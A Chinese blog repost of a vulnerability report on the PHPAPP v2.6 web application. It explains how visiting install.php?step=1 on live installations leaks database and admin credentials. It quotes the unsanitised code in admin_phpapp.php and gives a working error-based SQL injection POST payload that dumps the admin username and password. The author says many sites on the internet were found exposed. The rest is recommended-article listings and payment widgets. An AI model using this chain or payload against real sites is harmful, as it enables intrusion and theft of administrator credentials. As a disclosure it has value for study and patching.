php充值注入,PHPAPP注入第二枚(漏洞打包)

最新推荐文章于 2021-03-26 13:16:28 发布
最新推荐文章于 2021-03-26 13:16:28 发布
阅读量147 收藏
点赞数
文章标签: php充值注入

### 简要描述:

PHPAPP注入第二枚(漏洞打包)

### 详细说明:

在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-055604,然后去官网看了看,前几天刚有更新,就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。

PSOT注入点:wwww.xxx.com/admin.php?app=5&menu=10&action=5, 存在漏洞的文件在/phpapp/apps/apppay/admin_phpapp.php

首先说一下,这里的注入点是在后台,先不要说后台进不去,这个漏洞鸡肋了,我先说一下如何得到网站的管理员用户名和密码。访问www.xxxx.com//install.php?step=1

就可以得到网站数据库的信息和网站的后台信息了。在互联网上找了很多实例,都可以成功得到这些敏感信息。

[敏感信息.JPG](https://images.seebug.org/upload/201412/21235255de4c639c765a2f9d56e5048b0602110d.jpg)

然后访问www.xxxx.com/admin.php,登录以后就可以测试下面的漏洞了。

来看看漏洞是如何产生的/phpapp/apps/apppay/admin_phpapp.php

```

public function AccountDownAction(){

if($this->POST['Submit']){

$wheresql='';

if($this->POST['type']){

$paytype=$this->POST['type'];

$wheresql.=" AND paytype='$paytype' ";

}

if($this->POST['downtype']){

$aid1=$this->POST['account1'];

$aid2=$this->POST['account2'];

$wheresql.=" AND a.cid>=$aid1 AND a.cid<=$aid2 ";

}

$accountsarr=$this->GetMysqlArray('a.*,b.money,b.flow,b.uid,c.username,d.money AS nowmoney'," ((".$this->GetTable('consume')." AS a LEFT JOIN ".$this->GetTable('member_consume')." AS b ON a.cid=b.cid) LEFT JOIN "

.$this->GetTable('member')." AS c ON b.uid=c.uid) LEFT JOIN ".$this->GetTable('member_account')." AS d ON b.uid=d.uid WHERE b.uid>0 $wheresql ORDER BY a.cid ASC");

include(APPS.'/apppay/class/process_class_phpapp.php');

无关代码

```

可以看到,这里没有对type、account1、account2作任何处理,就带入了SQL语句,造成了注入。

下面以type为例进行证明:

Phpapp可以显错,那就用error-based blind进行注入。

Pyload:(POST提交)

```

Submit=12&type=1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password)from

phpapp_member limit 0,1))a from information_schema.tables group by a)b)#&downtype=12&account1=1&account2=2

```

注入成功,管理员用户名及密码如下图所示:

[注入成功副本.jpg](https://images.seebug.org/upload/201412/212353471993a85fb9dd3c855e7735d1f419cd87.jpg)

### 漏洞证明:

见 详细说明

loading-bars.svg

weixin_39869197
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 漏洞_十大PHP安全漏洞
culi4814的博客
08-11 1761
php 漏洞Security is not a list of things you do. Security is a way of thinking, a way of looking at things, a way of dealing with the world that says “I don’t know how they’ll do it, but I know they’re ...
thinkphp框架5.0.23安全更新问题-漏洞修复-/thinkphp/library/think/App.php具体怎么改以及为什么要这么改
一颗优雅草科技-央千澈的CSDN博客~只想无穷无尽的学习~
08-02 1147
thinkphp框架5.0.23安全更新问题-漏洞修复-/thinkphp/library/think/App.php具体怎么改以及为什么要这么改
php 二级弹窗,实现弹窗功能的俩种方法
weixin_30315143的博客
03-16 649
这次给大家带来实现弹窗功能的俩种方法,实现弹窗功能的的注意事项有哪些,下面就是实战案例,一起来看一下。这里利用jquery实现两种弹窗效果:1. 淡入弹窗效果:jQuery弹窗*{padding: 0;margin: 0;}.box{width: 100%;height: 100%;}.main{width: 100%;height: 100%;background-color: rgba(0,0...
PHPAPP SQL注入漏洞
m4s7er的专栏
02-13 503
PHPAPP是一款威客程序,前段时间看了一下,发现了一些问题。有一些已经提交到漏洞平台了,这里发一个没提交的。       存在漏洞文件:\phpapp\apps\pay\main_phpapp.php  GoPayTool方法    function GoPayTool($payarr){ //检查支付工具 $paytoolid=$payarr['PayToolID']; //$
php充值注入,高级php注入方法集锦
weixin_28758189的博客
03-24 121
不论是黑友,还是程序员,都需要了解'%23' and passWord='mypassid=-1 union select 1,1,1id=-1 union select char(97),char(97),char(97)id=1 union select 1,1,1 from membersid=1 union select 1,1,1 from adminid=1 union select ...
php infinity,无限Infinity
weixin_39781452的博客
03-26 184
无限Infinity 详细介绍无限Infinity漫画 ,一切都在消逝,帝国分崩离析,国王失位,众生涂炭,世界终结……这里曾是复仇者的世界,这里曾是首当其冲的世界。阅读顺序整理:Thanos Rising #1-5Avengers #1-3New Avengers #1-3Avengers #4New Avengers #4Avengers #5New Avengers #5-6Avengers ...
PHP依赖注入容器库.zip
07-11
依赖注入容器(Dependency Injection Container,简称DI Container)是软件开发中的一个重要概念,尤其在PHP这样的语言中,它有助于实现松耦合和可测试性。PHP的依赖注入容器库,如"auryn-master",旨在帮助开发者更...
APK一键注入网络验证后台PHP源码 亲测完美运营
04-24
apk加网络验证 一键注入 一键加弹窗 带后端卡密验证后台 -支持随时远程开关,实时生效 - 支持创建无限卡密 - 支持批量导出卡密 - 支持设置试用(自定义试用次数、自定义试用时间) -支持单码/卡验证 - 支持防...
基于PHP的手机APP软件推广网站.zip
04-19
2. **数据库管理**:为了存储APP信息、用户数据、下载统计等,网站需要与数据库进行交互。MySQL是PHP最常搭配的数据库管理系统,通过PHP的MySQLi或PDO扩展进行连接和查询操作。 3. **用户认证与授权**:网站可能...
PHP APP分发系统大仙分发平台源码 支持苹果免签封和打包
03-14
这个系统的主要功能是提供苹果应用的免签封和打包服务,尤其针对苹果iOS设备,它允许用户在无需经过Apple官方签名的情况下进行APP的安装和分发。这在一定程度上简化了iOS应用的部署流程,特别适用于企业内部或特定...
App封装源码整站分发PHP源码.zip
11-19
2. `app.php`、`admin.php`、`plugin.php`、`index.php`:这些都是PHP应用程序的主要文件,它们可能分别对应着应用的主页面、后台管理页面、插件管理和入口文件。这些文件负责处理用户请求,展示页面内容,以及执行...
【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析
12-03 576
  0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest 默认后台地址:http://127.0.0.1/admincp.php 默认账号密码:用户名密码自设 测试网站首页:   0x...
PHP程序的常见漏洞攻击分析
weixin_30882895的博客
09-22 395
PHP程序也不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来...
php远程代码执行漏洞绕过,PHP远程代码执行漏洞:CVE
weixin_42127754的博客
03-19 272
漏洞详情:Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。影响范围:Nginx+php-fpm的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。location ~ [^/]\.php(/|$) {fastcg...
PHP漏洞全解
04-15 985
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
存在sql注入漏洞php,TCCMS在app/controller/news.class.php存在sql注入漏洞
weixin_39974223的博客
03-13 136
### 1. 漏洞成因在app/controller/news.class.php中all函数对参数过滤不严```public function all() {$this->userIsLogin ();$_Obj = M($this->objName);$categoryObj = M("category");$_Obj->pageSize = 20;$where = "1=1...
git教程【源码管理系统教程及版本管理功能教程】
08-13
git是一种源码管理系统(source code management,缩写为SCM)。它对当前文件提供版本管理功能,核心思想是对当前文件建立一个对象数据库(object database),将历史版本信息存放在这个数据库中。 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
财务收入支出系统
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
某智能工厂数字化化集成落地项目.pptx
最新发布
08-13
某智能工厂数字化化集成落地项目.pptx
使用Frida检测App中是否有SQL注入漏洞
06-07
Frida是一款功能强大的动态分析工具,可以帮助我们检测App中的SQL注入漏洞。以下是使用Frida检测App中是否存在SQL注入漏洞的步骤: 1. 安装Frida框架,并在移动设备上安装Frida客户端。 2. 在移动设备上运行要分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值